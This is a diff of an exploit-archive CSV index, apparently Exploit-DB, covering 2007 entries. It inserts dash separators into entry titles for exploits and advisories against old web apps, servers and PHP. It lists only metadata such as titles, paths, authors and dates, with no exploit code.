-3347,platforms/windows/dos/3347.cpp,"FTP Explorer 1.0.1 Build 047 (CPU consumption) Remote DoS Exploit",2007-02-20,Marsu,windows,dos,0 -3348,platforms/php/webapps/3348.txt,"SendStudio <= 2004.14 (ROOTDIR) Remote File Inclusion",2007-02-20,K-159,php,webapps,0 +3347,platforms/windows/dos/3347.cpp,"FTP Explorer 1.0.1 Build 047 - (CPU consumption) Remote DoS Exploit",2007-02-20,Marsu,windows,dos,0 +3348,platforms/php/webapps/3348.txt,"SendStudio <= 2004.14 - (ROOTDIR) Remote File Inclusion",2007-02-20,K-159,php,webapps,0 3349,platforms/windows/local/3349.c,"News Bin Pro 5.33 - (.NBI) Local Buffer Overflow Exploit",2007-02-21,Marsu,windows,local,0 3350,platforms/windows/dos/3350.html,"BrowseDialog Class (ccrpbds6.dll) Multiple Methods DoS Exploit",2007-02-21,shinnai,windows,dos,0 -3351,platforms/php/webapps/3351.pl,"webSPELL <= 4.01.02 (topic) Remote SQL Injection Exploit",2007-02-21,DNX,php,webapps,0 +3351,platforms/php/webapps/3351.pl,"webSPELL <= 4.01.02 - (topic) Remote SQL Injection Exploit",2007-02-21,DNX,php,webapps,0 3352,platforms/php/webapps/3352.php,"Connectix Boards <= 0.7 - (p_skin) Multiple Vulnerabilities",2007-02-21,DarkFig,php,webapps,0 3353,platforms/php/webapps/3353.txt,"DBImageGallery 1.2.2 - (donsimg_base_path) RFI Vulnerabilities",2007-02-21,Denven,php,webapps,0 -3354,platforms/php/webapps/3354.txt,"DBGuestbook 1.1 (dbs_base_path) Remote File Include Vulnerabilities",2007-02-21,Denven,php,webapps,0 -3355,platforms/php/webapps/3355.php,"Nabopoll 1.2 (result.php surv) Remote Blind SQL Injection Exploit",2007-02-21,s0cratex,php,webapps,0 +3354,platforms/php/webapps/3354.txt,"DBGuestbook 1.1 - (dbs_base_path) Remote File Include Vulnerabilities",2007-02-21,Denven,php,webapps,0 +3355,platforms/php/webapps/3355.php,"Nabopoll 1.2 - (result.php surv) Remote Blind SQL Injection Exploit",2007-02-21,s0cratex,php,webapps,0 3356,platforms/linux/local/3356.sh,"Nortel SSL VPN Linux Client <= 6.0.3 - Local Privilege Escalation Exploit",2007-02-21,"Jon Hart",linux,local,0 3357,platforms/php/webapps/3357.txt,"DZCP (deV!L_z Clanportal) <= 1.4.5 - Remote File Disclosure",2007-02-21,Kiba,php,webapps,0 3358,platforms/multiple/remote/3358.pl,"Oracle 10g KUPW$WORKER.MAIN Grant/Revoke dba Permission Exploit",2007-02-22,bunker,multiple,remote,0 3359,platforms/multiple/remote/3359.pl,"Oracle 10g KUPV$FT.ATTACH_JOB Grant/Revoke dba Permission Exploit",2007-02-22,bunker,multiple,remote,0 -3360,platforms/php/webapps/3360.txt,"FlashGameScript 1.5.4 (index.php func) Remote File Include",2007-02-22,JuMp-Er,php,webapps,0 -3361,platforms/php/webapps/3361.txt,"eFiction <= 3.1.1 (path_to_smf) Remote File Include Vulnerabilities",2007-02-22,"ThE dE@Th",php,webapps,0 +3360,platforms/php/webapps/3360.txt,"FlashGameScript 1.5.4 - (index.php func) Remote File Include",2007-02-22,JuMp-Er,php,webapps,0 +3361,platforms/php/webapps/3361.txt,"eFiction <= 3.1.1 - (path_to_smf) Remote File Include Vulnerabilities",2007-02-22,"ThE dE@Th",php,webapps,0 3362,platforms/multiple/dos/3362.py,"Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow DoS Exploit",2007-02-23,"Trirat Puttaraksa",multiple,dos,0 3363,platforms/multiple/remote/3363.pl,"Oracle 9i/10g DBMS_METADATA.GET_DDL SQL Injection Exploit",2007-02-23,bunker,multiple,remote,0 3364,platforms/windows/remote/3364.pl,"Oracle 9i/10g ACTIVATE_SUBSCRIPTION SQL Injection Exploit",2007-02-23,bunker,windows,remote,0 -3365,platforms/php/webapps/3365.txt,"FCRing <= 1.31 (fcring.php s_fuss) Remote File Include",2007-02-23,kezzap66345,php,webapps,0 +3365,platforms/php/webapps/3365.txt,"FCRing <= 1.31 - (fcring.php s_fuss) Remote File Include",2007-02-23,kezzap66345,php,webapps,0 3366,platforms/php/webapps/3366.txt,"Sinapis 2.2 Gastebuch (sinagb.php fuss) Remote File Include",2007-02-23,kezzap66345,php,webapps,0 -3367,platforms/php/webapps/3367.txt,"Sinapis Forum 2.2 (sinapis.php fuss) Remote File Include",2007-02-23,kezzap66345,php,webapps,0 +3367,platforms/php/webapps/3367.txt,"Sinapis Forum 2.2 - (sinapis.php fuss) Remote File Include",2007-02-23,kezzap66345,php,webapps,0 3369,platforms/windows/local/3369.pl,"News Rover 12.1 Rev 1 - Remote Stack Overflow Exploit (perl)",2007-02-24,"Umesh Wanve",windows,local,0 -3370,platforms/php/webapps/3370.pl,"Extreme phpBB 3.0.1 (functions.php) Remote File Include Exploit",2007-02-24,"Mehmet Ince",php,webapps,0 +3370,platforms/php/webapps/3370.pl,"Extreme phpBB 3.0.1 - (functions.php) Remote File Include Exploit",2007-02-24,"Mehmet Ince",php,webapps,0 3371,platforms/php/webapps/3371.php,"Coppermine Photo Gallery 1.3.x - Remote Blind SQL Injection Exploit",2007-02-24,s0cratex,php,webapps,0 -3372,platforms/php/webapps/3372.php,"CS-Gallery 2.0 (index.php album) Remote File Include Exploit",2007-02-24,burncycle,php,webapps,0 +3372,platforms/php/webapps/3372.php,"CS-Gallery 2.0 - (index.php album) Remote File Include Exploit",2007-02-24,burncycle,php,webapps,0 3373,platforms/php/webapps/3373.pl,"phpBB Module NoMoKeTos Rules 0.0.1 - Remote File Include Exploit",2007-02-24,bd0rk,php,webapps,0 -3374,platforms/php/webapps/3374.txt,"PHP-MIP 0.1 (top.php laypath) Remote File Include",2007-02-25,GoLd_M,php,webapps,0 +3374,platforms/php/webapps/3374.txt,"PHP-MIP 0.1 - (top.php laypath) Remote File Include",2007-02-25,GoLd_M,php,webapps,0 3375,platforms/multiple/remote/3375.pl,"Oracle 10g KUPW$WORKER.MAIN - SQL Injection Exploit (2)",2007-02-26,bunker,multiple,remote,0 3376,platforms/multiple/remote/3376.pl,"Oracle 10g KUPV$FT.ATTACH_JOB - SQL Injection Exploit (2)",2007-02-26,bunker,multiple,remote,0 3377,platforms/multiple/remote/3377.pl,"Oracle 9i/10g DBMS_METADATA.GET_DDL - SQL Injection Exploit (2)",2007-02-26,bunker,multiple,remote,0 @@ -3053,36 +3053,36 @@ id,file,description,date,author,platform,type,port 3384,platforms/linux/local/3384.c,"Apache 1.3.33/1.3.34 (Ubuntu / Debian) - (CGI TTY) Local Root Exploit",2007-02-28,"Kristian Hermansen",linux,local,0 3385,platforms/windows/dos/3385.pl,"XM Easy Personal FTP Server 5.30 - (ABOR) Format String DoS Exploit",2007-02-28,"Umesh Wanve",windows,dos,0 3386,platforms/osx/local/3386.pl,"McAfee VirusScan for Mac (Virex) <= 7.7 - Local Root Exploit",2007-02-28,"Kevin Finisterre",osx,local,0 -3387,platforms/php/webapps/3387.php,"vBulletin <= 3.6.4 (inlinemod.php postids) Remote SQL Injection Exploit",2007-02-28,rgod,php,webapps,0 +3387,platforms/php/webapps/3387.php,"vBulletin <= 3.6.4 - (inlinemod.php postids) Remote SQL Injection Exploit",2007-02-28,rgod,php,webapps,0 3388,platforms/windows/remote/3388.pl,"3Com TFTP Service <= 2.0.1 - (Long Transporting Mode) Exploit (Perl)",2007-02-28,"Umesh Wanve",windows,remote,69 3389,platforms/linux/remote/3389.c,"madwifi <= 0.9.2.1 - WPA/RSN IE Remote Kernel Buffer Overflow Exploit",2007-03-01,"Massimiliano Oldani",linux,remote,0 -3390,platforms/asp/webapps/3390.txt,"Angel Lms 7.1 (default.asp id) Remote SQL Injection",2007-03-01,"Craig Heffner",asp,webapps,0 +3390,platforms/asp/webapps/3390.txt,"Angel Lms 7.1 - (default.asp id) Remote SQL Injection",2007-03-01,"Craig Heffner",asp,webapps,0 3391,platforms/windows/remote/3391.py,"Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit",2007-03-01,"Trirat Puttaraksa",windows,remote,0 -3392,platforms/windows/dos/3392.html,"DivX Web Player 1.3.0 (npdivx32.dll) Remote Denial of Service Exploit",2007-03-01,shinnai,windows,dos,0 +3392,platforms/windows/dos/3392.html,"DivX Web Player 1.3.0 - (npdivx32.dll) Remote Denial of Service Exploit",2007-03-01,shinnai,windows,dos,0 3393,platforms/php/webapps/3393.php,"phpMyFAQ <= 1.6.7 - Remote SQL Injection / Command Execution Exploit",2007-03-01,elgCrew,php,webapps,0 3394,platforms/multiple/dos/3394.php,"PHP 4 Userland ZVAL Reference Counter Overflow Exploit PoC",2007-03-01,"Stefan Esser",multiple,dos,0 -3395,platforms/windows/remote/3395.c,"WebMod 0.48 (Content-Length) Remote Buffer Overflow Exploit PoC",2007-03-01,cybermind,windows,remote,0 +3395,platforms/windows/remote/3395.c,"WebMod 0.48 - (Content-Length) Remote Buffer Overflow Exploit PoC",2007-03-01,cybermind,windows,remote,0 3396,platforms/linux/dos/3396.php,"PHP <= 4.4.4 unserialize() ZVAL Reference Counter Overflow Exploit PoC",2007-03-02,"Stefan Esser",linux,dos,0 -3397,platforms/windows/remote/3397.pl,"MailEnable Pro/Ent <= 2.37 (APPEND) Remote Buffer Overflow Exploit",2007-03-02,mu-b,windows,remote,143 +3397,platforms/windows/remote/3397.pl,"MailEnable Pro/Ent <= 2.37 - (APPEND) Remote Buffer Overflow Exploit",2007-03-02,mu-b,windows,remote,143 39567,platforms/php/webapps/39567.txt,"Monstra CMS 3.0.3 - Multiple Vulnerabilities",2016-03-16,"Sarim Kiani",php,webapps,80 -3398,platforms/php/webapps/3398.txt,"Mani Stats Reader <= 1.2 (ipath) Remote File Include",2007-03-02,mozi,php,webapps,0 +3398,platforms/php/webapps/3398.txt,"Mani Stats Reader <= 1.2 - (ipath) Remote File Include",2007-03-02,mozi,php,webapps,0 3399,platforms/windows/dos/3399.txt,"Netrek 2.12.0 - pmessage2() Remote Limited Format String Exploit",2007-03-02,"Luigi Auriemma",windows,dos,0 3400,platforms/php/webapps/3400.pl,"webSPELL <= 4.01.02 - Multiple Remote SQL Injection Exploit",2007-03-02,DNX,php,webapps,0 3402,platforms/php/webapps/3402.php,"webSPELL <= 4.01.02 - Remote PHP Code Execution Exploit",2007-03-03,DarkFig,php,webapps,0 3403,platforms/php/webapps/3403.php,"Rigter Portal System (RPS) 6.2 - Remote Blind SQL Injection Exploit",2007-03-04,s0cratex,php,webapps,0 3404,platforms/multiple/dos/3404.php,"PHP wddx_deserialize() String Append Crash Exploit",2007-03-04,"Stefan Esser",multiple,dos,0 3405,platforms/multiple/remote/3405.txt,"PHP 4.4.3 - 4.4.6 phpinfo() Remote XSS",2007-03-04,"Stefan Esser",multiple,remote,0 -3406,platforms/php/webapps/3406.pl,"News-Letterman 1.1 (eintrag.php sqllog) Remote File Include Exploit",2007-03-04,bd0rk,php,webapps,0 -3407,platforms/multiple/dos/3407.c,"Asterisk <= 1.2.15 / 1.4.0 pre-auth Remote Denial of Service Exploit",2007-03-04,fbffff,multiple,dos,0 +3406,platforms/php/webapps/3406.pl,"News-Letterman 1.1 - (eintrag.php sqllog) Remote File Include Exploit",2007-03-04,bd0rk,php,webapps,0 +3407,platforms/multiple/dos/3407.c,"Asterisk <= 1.2.15 - / 1.4.0 pre-auth Remote Denial of Service Exploit",2007-03-04,fbffff,multiple,dos,0 3408,platforms/php/webapps/3408.pl,"AJ Auction Pro - (subcat.php) Remote SQL Injection Exploit",2007-03-04,ajann,php,webapps,0 -3409,platforms/php/webapps/3409.htm,"AJ Dating 1.0 (view_profile.php) Remote SQL Injection Exploit",2007-03-04,ajann,php,webapps,0 -3410,platforms/php/webapps/3410.htm,"AJ Classifieds 1.0 (postingdetails.php) Remote SQL Injection Exploit",2007-03-04,ajann,php,webapps,0 -3411,platforms/php/webapps/3411.pl,"AJ Forum 1.0 (topic_title.php) Remote SQL Injection Exploit",2007-03-04,ajann,php,webapps,0 +3409,platforms/php/webapps/3409.htm,"AJ Dating 1.0 - (view_profile.php) Remote SQL Injection Exploit",2007-03-04,ajann,php,webapps,0 +3410,platforms/php/webapps/3410.htm,"AJ Classifieds 1.0 - (postingdetails.php) Remote SQL Injection Exploit",2007-03-04,ajann,php,webapps,0 +3411,platforms/php/webapps/3411.pl,"AJ Forum 1.0 - (topic_title.php) Remote SQL Injection Exploit",2007-03-04,ajann,php,webapps,0 3412,platforms/cgi/webapps/3412.txt,"RRDBrowse <= 1.6 - Remote Arbitrary File Disclosure",2007-03-04,"Sebastian Wolfgarten",cgi,webapps,0 -3413,platforms/multiple/local/3413.php,"PHP < 4.4.5 / 5.2.1 php_binary Session Deserialization Information Leak",2007-03-04,"Stefan Esser",multiple,local,0 -3414,platforms/multiple/local/3414.php,"PHP < 4.4.5 / 5.2.1 WDDX Session Deserialization Information Leak",2007-03-04,"Stefan Esser",multiple,local,0 -3415,platforms/linux/dos/3415.html,"Konqueror 3.5.5 (JavaScript Read of FTP Iframe) DoS Exploit",2007-03-05,mark,linux,dos,0 -3416,platforms/php/webapps/3416.pl,"Links Management Application 1.0 (lcnt) Remote SQL Injection Exploit",2007-03-05,ajann,php,webapps,0 +3413,platforms/multiple/local/3413.php,"PHP < 4.4.5 - / 5.2.1 php_binary Session Deserialization Information Leak",2007-03-04,"Stefan Esser",multiple,local,0 +3414,platforms/multiple/local/3414.php,"PHP < 4.4.5 - / 5.2.1 WDDX Session Deserialization Information Leak",2007-03-04,"Stefan Esser",multiple,local,0 +3415,platforms/linux/dos/3415.html,"Konqueror 3.5.5 - (JavaScript Read of FTP Iframe) DoS Exploit",2007-03-05,mark,linux,dos,0 +3416,platforms/php/webapps/3416.pl,"Links Management Application 1.0 - (lcnt) Remote SQL Injection Exploit",2007-03-05,ajann,php,webapps,0 3417,platforms/windows/local/3417.php,"PHP <= 4.4.6 - mssql_[p]connect() Local Buffer Overflow Exploit",2007-03-05,rgod,windows,local,0 3418,platforms/windows/dos/3418.pl,"Mercury/32 Mail Server <= 4.01b (check) Buffer Overflow Exploit PoC",2007-03-06,mu-b,windows,dos,0 3419,platforms/windows/dos/3419.txt,"Microsoft Windows - (.doc) Malformed Pointers Denial of Service Exploit",2007-03-06,Marsu,windows,dos,0 @@ -3091,94 +3091,94 @@ id,file,description,date,author,platform,type,port 3422,platforms/windows/remote/3422.pl,"Winamp <= 5.12 - (.pls) Remote Buffer Overflow Exploit (Perl)",2007-03-07,"Umesh Wanve",windows,remote,0 3423,platforms/php/webapps/3423.txt,"PHP-Nuke Module PostGuestbook 0.6.1 - (tpl_pgb_moddir) RFI",2007-03-07,GoLd_M,php,webapps,0 3424,platforms/multiple/local/3424.php,"PHP <= 5.2.1 substr_compare() Information Leak Exploit",2007-03-07,"Stefan Esser",multiple,local,0 -3425,platforms/multiple/remote/3425.txt,"mod_security <= 2.1.0 (ASCIIZ byte) POST Rules Bypass",2007-03-07,"Stefan Esser",multiple,remote,0 -3426,platforms/linux/local/3426.php,"PHP < 4.4.5 / 5.2.1 (shmop Functions) Local Code Execution Exploit",2007-03-07,"Stefan Esser",linux,local,0 +3425,platforms/multiple/remote/3425.txt,"mod_security <= 2.1.0 - (ASCIIZ byte) POST Rules Bypass",2007-03-07,"Stefan Esser",multiple,remote,0 +3426,platforms/linux/local/3426.php,"PHP < 4.4.5 / 5.2.1 - (shmop Functions) Local Code Execution Exploit",2007-03-07,"Stefan Esser",linux,local,0 3427,platforms/linux/local/3427.php,"PHP < 4.4.5 / 5.2.1 - (shmop) SSL RSA Private-Key Disclosure Exploit",2007-03-07,"Stefan Esser",linux,local,0 -3428,platforms/php/webapps/3428.txt,"Flat Chat 2.0 (include online.txt) Remote Code Execution",2007-03-07,Dj7xpl,php,webapps,0 +3428,platforms/php/webapps/3428.txt,"Flat Chat 2.0 - (include online.txt) Remote Code Execution",2007-03-07,Dj7xpl,php,webapps,0 3429,platforms/windows/local/3429.php,"PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit",2007-03-07,anonymous,windows,local,0 3430,platforms/windows/dos/3430.html,"Adobe Reader plugin AcroPDF.dll 8.0.0.0 - Resource Consumption",2007-03-08,shinnai,windows,dos,0 3431,platforms/windows/local/3431.php,"PHP 4.4.6 crack_opendict() Local Buffer Overflow Exploit PoC",2007-03-08,rgod,windows,local,0 3432,platforms/windows/dos/3432.pl,"TFTPDWIN Server 0.4.2 - (UDP) Denial of Service Exploit",2007-03-08,"Umesh Wanve",windows,dos,0 3433,platforms/windows/dos/3433.html,"Rediff Toolbar ActiveX Control Remote Denial of Service Exploit",2007-03-08,"Umesh Wanve",windows,dos,0 -3434,platforms/multiple/dos/3434.c,"Snort 2.6.1.1/2.6.1.2/2.7.0 (fragementation) Remote DoS Exploit",2007-03-08,Antimatt3r,multiple,dos,0 +3434,platforms/multiple/dos/3434.c,"Snort 2.6.1.1/2.6.1.2/2.7.0 - (fragementation) Remote DoS Exploit",2007-03-08,Antimatt3r,multiple,dos,0 3435,platforms/php/webapps/3435.txt,"netForo! 0.1 - (down.php file_to_download) Remote File Disclosure",2007-03-08,GoLd_M,php,webapps,0 3436,platforms/php/webapps/3436.txt,"WEBO (Web Organizer) <= 1.0 - (baseDir) Remote File Inclusion",2007-03-08,K-159,php,webapps,0 3437,platforms/asp/webapps/3437.txt,"GaziYapBoz Game Portal - (kategori.asp) Remote SQL Injection",2007-03-08,CyberGhost,asp,webapps,0 -3438,platforms/php/webapps/3438.txt,"Magic CMS 4.2.747 (mysave.php file) Remote File Include",2007-03-08,DNX,php,webapps,0 +3438,platforms/php/webapps/3438.txt,"Magic CMS 4.2.747 - (mysave.php file) Remote File Include",2007-03-08,DNX,php,webapps,0 3439,platforms/windows/local/3439.php,"PHP 4.4.6 snmpget() object id Local Buffer Overflow Exploit PoC",2007-03-09,rgod,windows,local,0 3440,platforms/linux/local/3440.php,"PHP 5.2.0 / PHP with PECL ZIP <= 1.8.3 - zip:// URL Wrapper BoF Exploit",2007-03-09,"Stefan Esser",linux,local,0 3441,platforms/linux/dos/3441.c,"Linux Omnikey Cardman 4040 Driver - Local Buffer Overflow Exploit PoC",2007-03-09,"Daniel Roethlisberger",linux,dos,0 3442,platforms/multiple/local/3442.php,"PHP 4.4.6 cpdf_open() Local Source Code Discslosure PoC",2007-03-09,rgod,multiple,local,0 3443,platforms/php/webapps/3443.txt,"PMB Services <= 3.0.13 - Multiple Remote File Inclusion",2007-03-09,K-159,php,webapps,0 3444,platforms/windows/dos/3444.pl,"Microsoft Internet Explorer - (FTP Server Response) DoS Exploit (MS07-016)",2007-03-09,"Mathew Rowley",windows,dos,0 -3447,platforms/php/webapps/3447.txt,"Grayscale Blog 0.8.0 (Security Bypass/SQL/XSS) Multiple Remote Vulnerabilities",2007-03-09,Omni,php,webapps,0 +3447,platforms/php/webapps/3447.txt,"Grayscale Blog 0.8.0 - (Security Bypass/SQL/XSS) Multiple Remote Vulnerabilities",2007-03-09,Omni,php,webapps,0 3448,platforms/php/webapps/3448.txt,"work system e-commerce <= 3.0.5 - Remote File Inclusion",2007-03-10,"Rodrigo Duarte",php,webapps,0 -3449,platforms/php/webapps/3449.txt,"HC Newssystem 1.0-1.4 (index.php ID) Remote SQL Injection",2007-03-10,WiLdBoY,php,webapps,0 +3449,platforms/php/webapps/3449.txt,"HC Newssystem 1.0-1.4 - (index.php ID) Remote SQL Injection",2007-03-10,WiLdBoY,php,webapps,0 3450,platforms/php/webapps/3450.php,"NukeSentinel <= 2.5.06 - Remote SQL Injection Exploit",2007-03-10,DarkFig,php,webapps,0 3451,platforms/windows/local/3451.c,"Oracle 10g - (PROCESS_DUP_HANDLE) Local Privilege Elevation (Win32)",2007-03-10,"Cesar Cerrudo",windows,local,0 3452,platforms/multiple/remote/3452.php,"PHP <= 5.2.0 ext/filter FDF Post Filter Bypass Exploit",2007-03-10,"Stefan Esser",multiple,remote,0 3453,platforms/windows/dos/3453.py,"Microsoft Windows - DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption",2007-03-10,h07,windows,dos,0 -3454,platforms/php/webapps/3454.pl,"PostNuke Module phgstats 0.5 (phgdir) Remote File Include Exploit",2007-03-11,bd0rk,php,webapps,0 -3455,platforms/php/webapps/3455.htm,"JobSitePro 1.0 (search.php) Remote SQL Injection Exploit",2007-03-11,ajann,php,webapps,0 -3456,platforms/php/webapps/3456.pl,"Top Auction 1.0 (viewcat.php) Remote SQL Injection Exploit",2007-03-11,ajann,php,webapps,0 -3457,platforms/php/webapps/3457.pl,"SonicMailer Pro <= 3.2.3 (index.php) Remote SQL Injection Exploit",2007-03-11,ajann,php,webapps,0 +3454,platforms/php/webapps/3454.pl,"PostNuke Module phgstats 0.5 - (phgdir) Remote File Include Exploit",2007-03-11,bd0rk,php,webapps,0 +3455,platforms/php/webapps/3455.htm,"JobSitePro 1.0 - (search.php) Remote SQL Injection Exploit",2007-03-11,ajann,php,webapps,0 +3456,platforms/php/webapps/3456.pl,"Top Auction 1.0 - (viewcat.php) Remote SQL Injection Exploit",2007-03-11,ajann,php,webapps,0 +3457,platforms/php/webapps/3457.pl,"SonicMailer Pro <= 3.2.3 - (index.php) Remote SQL Injection Exploit",2007-03-11,ajann,php,webapps,0 3458,platforms/php/webapps/3458.txt,"AssetMan <= 2.4a - (download_pdf.php) Remote File Disclosure",2007-03-11,"BorN To K!LL",php,webapps,0 -3459,platforms/php/webapps/3459.txt,"cPanel <= 10.9.x (fantastico) Local File Inclusion Vulnerabilities",2007-03-11,"cyb3rt & 020",php,webapps,0 +3459,platforms/php/webapps/3459.txt,"cPanel <= 10.9.x - (fantastico) Local File Inclusion Vulnerabilities",2007-03-11,"cyb3rt & 020",php,webapps,0 3460,platforms/osx/local/3460.php,"PHP 5.2.0 - ext/filter Space Trimming Buffer Underflow Exploit (MacOSX)",2007-03-12,"Stefan Esser",osx,local,0 3461,platforms/windows/dos/3461.pl,"TFTP Server 1.3 - Remote Buffer Overflow Denial of Service Exploit",2007-03-12,"Umesh Wanve",windows,dos,0 3462,platforms/windows/remote/3462.cpp,"NewsReactor 20070220 Article Grabbing Remote BoF Exploit (1)",2007-03-12,Marsu,windows,remote,0 3463,platforms/windows/remote/3463.cpp,"NewsReactor 20070220 Article Grabbing Remote BoF Exploit (2)",2007-03-12,Marsu,windows,remote,0 3464,platforms/windows/dos/3464.cpp,"News Bin Pro 4.32 Article Grabbing Remote Unicode BoF Exploit",2007-03-12,Marsu,windows,dos,0 3465,platforms/php/webapps/3465.txt,"OES (Open Educational System) 0.1beta - Remote File Inclusion",2007-03-12,K-159,php,webapps,0 -3466,platforms/asp/webapps/3466.txt,"BP Blog 7.0 (default.asp layout) Remote SQL Injection",2007-03-12,BeyazKurt,asp,webapps,0 -3467,platforms/php/webapps/3467.txt,"GestArt beta 1 (aide.php aide) Remote File Inclusion",2007-03-13,Dj7xpl,php,webapps,0 -3468,platforms/php/webapps/3468.txt,"MySQL Commander <= 2.7 (home) Remote File Inclusion",2007-03-13,K-159,php,webapps,0 -3469,platforms/asp/webapps/3469.txt,"X-ice News System 1.0 (devami.asp id) SQL Injection",2007-03-13,CyberGhost,asp,webapps,0 -3470,platforms/asp/webapps/3470.htm,"JGBBS 3.0beta1 (search.asp author) SQL Injection Exploit",2007-03-13,WiLdBoY,asp,webapps,0 +3466,platforms/asp/webapps/3466.txt,"BP Blog 7.0 - (default.asp layout) Remote SQL Injection",2007-03-12,BeyazKurt,asp,webapps,0 +3467,platforms/php/webapps/3467.txt,"GestArt beta 1 - (aide.php aide) Remote File Inclusion",2007-03-13,Dj7xpl,php,webapps,0 +3468,platforms/php/webapps/3468.txt,"MySQL Commander <= 2.7 - (home) Remote File Inclusion",2007-03-13,K-159,php,webapps,0 +3469,platforms/asp/webapps/3469.txt,"X-ice News System 1.0 - (devami.asp id) SQL Injection",2007-03-13,CyberGhost,asp,webapps,0 +3470,platforms/asp/webapps/3470.htm,"JGBBS 3.0beta1 - (search.asp author) SQL Injection Exploit",2007-03-13,WiLdBoY,asp,webapps,0 3471,platforms/php/webapps/3471.txt,"Activist Mobilization Platform (AMP) 3.2 - Remote File Include",2007-03-13,the_day,php,webapps,0 -3472,platforms/php/webapps/3472.txt,"CARE2X 1.1 (root_path) Remote File Inclusion",2007-03-13,the_day,php,webapps,0 -3473,platforms/php/webapps/3473.txt,"WebCreator <= 0.2.6-rc3 (moddir) Remote File Inclusion",2007-03-13,the_day,php,webapps,0 +3472,platforms/php/webapps/3472.txt,"CARE2X 1.1 - (root_path) Remote File Inclusion",2007-03-13,the_day,php,webapps,0 +3473,platforms/php/webapps/3473.txt,"WebCreator <= 0.2.6-rc3 - (moddir) Remote File Inclusion",2007-03-13,the_day,php,webapps,0 3474,platforms/windows/remote/3474.py,"WarFTP 1.65 - (USER) Remote Buffer Overflow Exploit (Windows 2000 SP4)",2007-03-14,"Winny Thomas",windows,remote,21 3476,platforms/php/webapps/3476.pl,"Zomplog <= 3.7.6 - Local File Inclusion Vulnerabilty (Win32)",2007-03-14,Bl0od3r,php,webapps,0 -3477,platforms/php/webapps/3477.htm,"WSN Guest 1.21 (comments.php id) Remote SQL Injection Exploit",2007-03-14,WiLdBoY,php,webapps,0 -3478,platforms/php/webapps/3478.htm,"Dayfox Blog 4 (postpost.php) Remote Code Execution",2007-03-14,Dj7xpl,php,webapps,0 +3477,platforms/php/webapps/3477.htm,"WSN Guest 1.21 - (comments.php id) Remote SQL Injection Exploit",2007-03-14,WiLdBoY,php,webapps,0 +3478,platforms/php/webapps/3478.htm,"Dayfox Blog 4 - (postpost.php) Remote Code Execution",2007-03-14,Dj7xpl,php,webapps,0 3479,platforms/linux/local/3479.php,"PHP <= 5.2.1 session_regenerate_id() Double Free Exploit",2007-03-14,"Stefan Esser",linux,local,0 3480,platforms/linux/local/3480.php,"PHP 5.2.0/5.2.1 - Rejected Session ID Double Free Exploit",2007-03-14,"Stefan Esser",linux,local,0 3481,platforms/asp/webapps/3481.htm,"Orion-Blog 2.0 - (AdminBlogNewsEdit.asp) Remote Auth Bypass",2007-03-15,WiLdBoY,asp,webapps,0 3482,platforms/windows/remote/3482.pl,"WarFTP 1.65 - (USER) Remote Buffer Overflow SEH Overflow Exploit",2007-03-15,"Umesh Wanve",windows,remote,21 -3483,platforms/php/webapps/3483.pl,"Woltlab Burning Board 2.x (usergroups.php) Remote SQL Injection Exploit",2007-03-15,x666,php,webapps,0 +3483,platforms/php/webapps/3483.pl,"Woltlab Burning Board 2.x - (usergroups.php) Remote SQL Injection Exploit",2007-03-15,x666,php,webapps,0 3484,platforms/php/webapps/3484.txt,"WebLog (index.php file) Remote File Disclosure",2007-03-15,Dj7xpl,php,webapps,0 3485,platforms/php/webapps/3485.txt,"Company WebSite Builder PRO 1.9.8 - (INCLUDE_PATH) RFI",2007-03-15,the_day,php,webapps,0 -3486,platforms/php/webapps/3486.txt,"Groupit 2.00b5 (c_basepath) Remote File Inclusion",2007-03-15,the_day,php,webapps,0 -3487,platforms/php/webapps/3487.pl,"CcMail 1.0.1 (update.php functions_dir) Remote File Inclusion Exploit",2007-03-15,Crackers_Child,php,webapps,0 +3486,platforms/php/webapps/3486.txt,"Groupit 2.00b5 - (c_basepath) Remote File Inclusion",2007-03-15,the_day,php,webapps,0 +3487,platforms/php/webapps/3487.pl,"CcMail 1.0.1 - (update.php functions_dir) Remote File Inclusion Exploit",2007-03-15,Crackers_Child,php,webapps,0 3488,platforms/windows/local/3488.php,"PHP <= 4.4.6 ibase_connect() Local Buffer Overflow Exploit",2007-03-15,rgod,windows,local,0 3489,platforms/php/webapps/3489.txt,"creative guestbook 1.0 - Multiple Vulnerabilities",2007-03-15,Dj7xpl,php,webapps,0 3490,platforms/php/webapps/3490.txt,"wbblog - (XSS/SQL) Multiple Vulnerabilities",2007-03-15,"Mehmet Ince",php,webapps,0 3491,platforms/bsd/remote/3491.py,"OpenBSD - ICMPv6 Fragment Remote Execution Exploit PoC",2007-03-15,"Core Security",bsd,remote,0 -3492,platforms/php/webapps/3492.txt,"WebCalendar 0.9.45 (includedir) Remote File Inclusion",2007-03-15,Drackanz,php,webapps,0 +3492,platforms/php/webapps/3492.txt,"WebCalendar 0.9.45 - (includedir) Remote File Inclusion",2007-03-15,Drackanz,php,webapps,0 3493,platforms/asp/webapps/3493.txt,"Absolute Image Gallery 2.0 - (gallery.asp categoryid) SQL Injection",2007-03-15,WiLdBoY,asp,webapps,0 3494,platforms/php/webapps/3494.txt,"McGallery 0.5b (download.php) Arbitrary File Download",2007-03-15,Piker,php,webapps,0 3495,platforms/windows/remote/3495.txt,"CA BrightStor ARCserve (msgeng.exe) Remote Stack Overflow Exploit",2007-03-16,"Winny Thomas",windows,remote,6503 3496,platforms/php/webapps/3496.php,"Php-Stats <= 0.1.9.1b (PC-REMOTE-ADDR) SQL Injection Exploit",2007-03-16,rgod,php,webapps,0 3497,platforms/php/webapps/3497.php,"Php-Stats <= 0.1.9.1b (ip) Remote SQL Injection Exploit",2007-03-16,rgod,php,webapps,0 -3498,platforms/php/webapps/3498.txt,"Creative Files 1.2 (kommentare.php) Remote SQL Injection",2007-03-16,"Mehmet Ince",php,webapps,0 -3499,platforms/linux/local/3499.php,"PHP <= 4.4.6 / 5.2.1 array_user_key_compare() ZVAL dtor Local Exploit",2007-03-16,"Stefan Esser",linux,local,0 -3500,platforms/php/webapps/3500.htm,"Particle Blogger <= 1.2.0 (post.php postid) Remote SQL Injection Exploit",2007-03-16,WiLdBoY,php,webapps,0 +3498,platforms/php/webapps/3498.txt,"Creative Files 1.2 - (kommentare.php) Remote SQL Injection",2007-03-16,"Mehmet Ince",php,webapps,0 +3499,platforms/linux/local/3499.php,"PHP <= 4.4.6 - / 5.2.1 array_user_key_compare() ZVAL dtor 